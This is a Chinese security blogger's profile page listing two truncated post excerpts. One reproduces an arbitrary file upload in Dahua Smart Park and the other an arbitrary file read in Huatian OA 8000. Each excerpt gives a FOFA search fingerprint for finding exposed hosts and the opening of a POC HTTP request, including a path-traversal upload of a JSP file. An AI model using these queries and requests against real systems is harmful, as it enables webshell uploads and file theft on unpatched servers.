Track

wax

0关注
0粉丝
5文章
返回网站首页

您已发布 5篇文章作品写文章

大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)

没错,又是我大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)还是老规矩,fofa先上fofa指纹:body=”/WPMS/asset/lib/gridster/“主站页面如下上pocPOC文字版POST /emap/webservice/gis/soap/poi HTTP/1.1Host: e.m.p.e:ror/../../emperor.jspPC

 2023-8-23
 0 
 887 

华天OA 8000 任意文件读取

华天OA 8000 任意文件读取poc 截止到发表日期该漏洞对最新版有效fofa : app=”华天动力-OA8000” 手动poc:POST /OAapp/jsp/trace/ntkodownload.jsp HTTP/1.1Host: *.*.*.*:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)

 2023-8-18
 0 
 101